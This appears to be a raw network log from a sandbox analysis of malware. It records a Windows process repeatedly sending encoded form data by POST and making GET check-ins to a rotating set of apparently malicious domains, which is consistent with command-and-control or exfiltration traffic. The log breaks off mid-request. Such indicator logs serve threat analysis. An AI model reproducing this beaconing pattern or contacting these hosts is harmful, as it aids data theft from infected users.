                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.komart.shop
                                                                                  Origin: http://www.komart.shop
                                                                                  Referer: http://www.komart.shop/qwk1/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:58:07.910007954 CEST | 668 | IN | HTTP/1.1 404 Not Found
                                                                                  content-encoding: gzip
                                                                                  content-type: text/html
                                                                                  date: Wed, 25 Sep 2024 07:58:07 GMT
                                                                                  etag: W/"66d6a4ca-2b5"
                                                                                  server: nginx
                                                                                  vary: Accept-Encoding
                                                                                  content-length: 454
                                                                                  connection: close


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  53 | 192.168.11.20 | 49809 | 133.130.35.90 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:58:10.427831888 CEST | 545 | OUT | GET /qwk1/?Xb3xI=zuS7aiF7UCmUZEGCFTElZNoc1TsXMIUH7bJjsGqWHOHqpoebjKjp7AEKoIo96ikD3t7upPrvfpp3YpWkIK1WRnsiE3z7WHp76C45XcEHI5LxV+/vcHJ1HMs=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.komart.shop
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:58:10.706590891 CEST | 883 | IN | HTTP/1.1 404 Not Found
                                                                                  content-type: text/html
                                                                                  date: Wed, 25 Sep 2024 07:58:10 GMT
                                                                                  etag: W/"66d6a4ca-2b5"
                                                                                  server: nginx
                                                                                  vary: Accept-Encoding
                                                                                  content-length: 693
                                                                                  connection: close
                                                                                  Data Ascii: <!DOCTYPE html><html lang="ja"><head> <title></title> <meta http-equiv="content-type" content="text/html; charset=euc-jp" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/error.css"></head><body><div class="p-error"> <img src="/img/error/error.png" alt="" class="p-error__image"> <div class="p-error__message"> <p> <br> 30 </p> <p> <a href="/">TOP</a> </p> </div></div><script> setTimeout("redirect()", 30000); function redirect(){ location.href="/"; }</script></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  54 | 192.168.11.20 | 49810 | 137.175.33.56 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:58:16.291539907 CEST | 798 | OUT | POST /ytua/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dxeg.lol
                                                                                  Origin: http://www.dxeg.lol
                                                                                  Referer: http://www.dxeg.lol/ytua/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:58:16.462749004 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 07:58:16 GMT
                                                                                  Content-Type: text/html
                                                                                  Last-Modified: Tue, 24 Sep 2024 16:20:03 GMT
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  ETag: W/"66f2e6b3-49f9"
                                                                                  Content-Encoding: gzip


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  55 | 192.168.11.20 | 49811 | 137.175.33.56 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:58:18.996514082 CEST | 818 | OUT | POST /ytua/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dxeg.lol
                                                                                  Origin: http://www.dxeg.lol
                                                                                  Referer: http://www.dxeg.lol/ytua/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:58:19.167783976 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 07:58:19 GMT
                                                                                  Content-Type: text/html
                                                                                  Last-Modified: Tue, 24 Sep 2024 16:20:03 GMT
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  ETag: W/"66f2e6b3-49f9"
                                                                                  Content-Encoding: gzip


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  56 | 192.168.11.20 | 49812 | 137.175.33.56 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:58:21.694941998 CEST | 2578 | OUT | POST /ytua/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dxeg.lol
                                                                                  Origin: http://www.dxeg.lol
                                                                                  Referer: http://www.dxeg.lol/ytua/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:58:21.862380981 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 07:58:21 GMT
                                                                                  Content-Type: text/html
                                                                                  Last-Modified: Tue, 24 Sep 2024 16:20:03 GMT
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  ETag: W/"66f2e6b3-49f9"
                                                                                  Content-Encoding: gzip


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  57 | 192.168.11.20 | 49813 | 137.175.33.56 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:58:24.398310900 CEST | 542 | OUT | GET /ytua/?Xb3xI=eEoKyIBkgP1r3UaSX5x2BcdCaSeQE0m7SIzn6MAF2Eoa7eZjgA7VjWJ9hDDUm15GkCbg2BHkZRaH6Ojl2CuAMP081j8WR4/cwGyXJgzH3SFq+T0y0nykltc=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dxeg.lol
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:58:24.568648100 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 07:58:24 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 18937
                                                                                  Last-Modified: Tue, 24 Sep 2024 16:20:03 GMT
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  ETag: "66f2e6b3-49f9"
                                                                                  Accept-Ranges: bytes


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  58 | 192.168.11.20 | 49814 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:58:29.977009058 CEST | 810 | OUT | POST /dlt0/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.tukaari.shop
                                                                                  Origin: http://www.tukaari.shop
                                                                                  Referer: http://www.tukaari.shop/dlt0/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=wkNNxgFGYdpeMXWZTu3qFtdeNFRmYe5kDMaePjKhvMz8VhqR9kpZ4rHnpQwR+vCbFMWXHzTHFeRWqNTxARWtm0jbbRHq+qM5qdmwaCzPZTittCgIXPtySPLg3O17vGVa/X3AZtzux2OYBX96Dc4Jw2W/7ImDb4EqMMx9gDCNp2dy8MX/VZaqsHwTMTsmkRH0HQ==


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  59 | 192.168.11.20 | 49815 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:58:32.611330032 CEST | 830 | OUT | POST /dlt0/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.tukaari.shop
                                                                                  Origin: http://www.tukaari.shop
                                                                                  Referer: http://www.tukaari.shop/dlt0/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=wkNNxgFGYdpeenmZfpDqDNdfIFRmW+5gDMWePgGxv+X8SEWR8g1Z5rHnwgwUh/CuFMahHzfHFe1WqMPxAmKu0UjFOBHoh6M5qdmwaC2aZT6tszQIWut1YvLv+u17rGVe/X3iZse5x1mYBT56NpMKlmX2/InBUYdcI/1JxBWWsFUO5aGlIruOvUshIjVOmTGvaSkza7gzcRh8oECY8TfIYu4=


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  60 | 192.168.11.20 | 49816 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:58:35.251199961 CEST | 2578 | OUT | POST /dlt0/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.tukaari.shop
                                                                                  Origin: http://www.tukaari.shop
                                                                                  Referer: http://www.tukaari.shop/dlt0/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  61 | 192.168.11.20 | 49817 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:58:37.889362097 CEST | 546 | OUT | GET /dlt0/?Xb3xI=9mltyUpqTpNFGgiLLM/QIt0JA1EyaLVwbNO6LVK8xMKAahqO0kx85NrrrztI4+WdJ+WmFSXeCNM39PHdIGjD1nD8ckOcgacQtsimUjnJeyDglSYeX59cdP4=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.tukaari.shop
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:58:37.994091988 CEST | 398 | IN | HTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 25 Sep 2024 07:58:37 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 258
                                                                                  Connection: close
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Xb3xI=9mltyUpqTpNFGgiLLM/QIt0JA1EyaLVwbNO6LVK8xMKAahqO0kx85NrrrztI4+WdJ+WmFSXeCNM39PHdIGjD1nD8ckOcgacQtsimUjnJeyDglSYeX59cdP4=&O4bP=9dRH6ZfHbJX"}</script></head></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  62 | 192.168.11.20 | 49818 | 208.91.197.27 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:58:46.210294962 CEST | 548 | OUT | GET /ewr1/?Xb3xI=yez6Hf8Nj9Hz2QzY0/kGZkWHaPFJ5S6eHe7u1tM28nyQurG92QfHcGFdjgIUViF/gPksZ2ZTtaNFMQ6yCGD+tVTZAN9QT6lG744IlGnILDcgbby9ijaATPk=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.inastra.online
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:58:46.820354939 CEST | 850 | IN | HTTP/1.1 200 OK
                                                                                  Date: Wed, 25 Sep 2024 07:58:46 GMT
                                                                                  Server: Apache
                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_UP/oXrOJKx5Px23h5aSJS+oKMRSneW00UJk4HMw8N9IbD/BEJLmbJrcK3IzmqRJiTImNebP27gJiT5sU3vUkKA==
                                                                                  Transfer-Encoding: chunked
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Connection: close


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  63 | 192.168.11.20 | 49819 | 13.248.169.48 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:58:52.233793974 CEST | 813 | OUT | POST /tcs6/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.invicta.world
                                                                                  Origin: http://www.invicta.world
                                                                                  Referer: http://www.invicta.world/tcs6/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=ZRDWWn0ISYUYYrhjm4+uDUd4Wwu6EqgWNuWenRpkC+GCNMykkhILHDN609TlAeQPh6ZiYgSNJ0lHblZ65Jte5HSqBAU19b0knXnzr+oxslc1gNlk5yt3Grl+rMwDl3J+pO+oz73gtxA+bL/7EB7gez0lm8OPn5+0eLrwavb68b8PlmVQRNIIcyab+iOS82jRsg==


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  64 | 192.168.11.20 | 49820 | 13.248.169.48 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:58:54.881755114 CEST | 833 | OUT | POST /tcs6/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.invicta.world
                                                                                  Origin: http://www.invicta.world
                                                                                  Referer: http://www.invicta.world/tcs6/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=ZRDWWn0ISYUYKaRjlZ+uC0d7Vwu6NKgKNuaenQt0DMSCKsCklkkLKjN68dTkN+Rih6dAYkSNJ1BHbkp64+Zf4XSsMgUzir0knXnzr9UfslU1gdVkrWx2Y7lxhswDh3J6pO/9z/XOtzI+bP77AA7nHj0/scPchp74e/eNcI7x151ypQEKM/8sfhGp6S36+0iKxsiwan7/kiPcb+D37cN7Qfs=


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  65 | 192.168.11.20 | 49821 | 13.248.169.48 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:58:57.515466928 CEST | 6445 | OUT | POST /tcs6/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.invicta.world
                                                                                  Origin: http://www.invicta.world
                                                                                  Referer: http://www.invicta.world/tcs6/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  66 | 192.168.11.20 | 49822 | 13.248.169.48 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:59:00.155721903 CEST | 547 | OUT | GET /tcs6/?Xb3xI=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.invicta.world
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:59:00.261560917 CEST | 398 | IN | HTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 25 Sep 2024 07:59:00 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 258
                                                                                  Connection: close
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Xb3xI=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&O4bP=9dRH6ZfHbJX"}</script></head></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  67 | 192.168.11.20 | 49823 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:59:05.385103941 CEST | 834 | OUT | POST /bqye/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.whats-in-the-box.org
                                                                                  Origin: http://www.whats-in-the-box.org
                                                                                  Referer: http://www.whats-in-the-box.org/bqye/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=lpp2G9wZJQS0MlGRsWnVtSTc2OoujJdPs8tz4LUGUp85oIUzzJPc9UtE5b8lPuD8o17QtYlE++WjwKPRiUfEquo18cEgU1V92kXxu1GTOWl92J6L1PWTNuBYn7CF/mK+e7ODitQZRyrUbupATCvQUVXxOygiWWoaTh4LlwSjp5OZPEzFJ4IImrhpwJOfHYP0cw==


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  68 | 192.168.11.20 | 49824 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:59:08.025620937 CEST | 854 | OUT | POST /bqye/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.whats-in-the-box.org
                                                                                  Origin: http://www.whats-in-the-box.org
                                                                                  Referer: http://www.whats-in-the-box.org/bqye/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=lpp2G9wZJQS0NGeRp1fVryTfzOouqpdLs8hz4KRDU7I5mNozyIPcx0tE378gLuDno1mvtYJE++CjwL/RllfDr+or08EibVV92kXxuxr+OW992ZmL1uWUT+BbzrCFu2L3e7OlioI/RwjUbsxASTvTBlX3Kyg1ZX1UfFN6lDvwjM2tDyifUK8sl49b0533FaOvB+LibGAb0RRM2eQXUgNkMv4=


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  69 | 192.168.11.20 | 49825 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:59:10.665514946 CEST | 1289 | OUT | POST /bqye/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.whats-in-the-box.org
                                                                                  Origin: http://www.whats-in-the-box.org
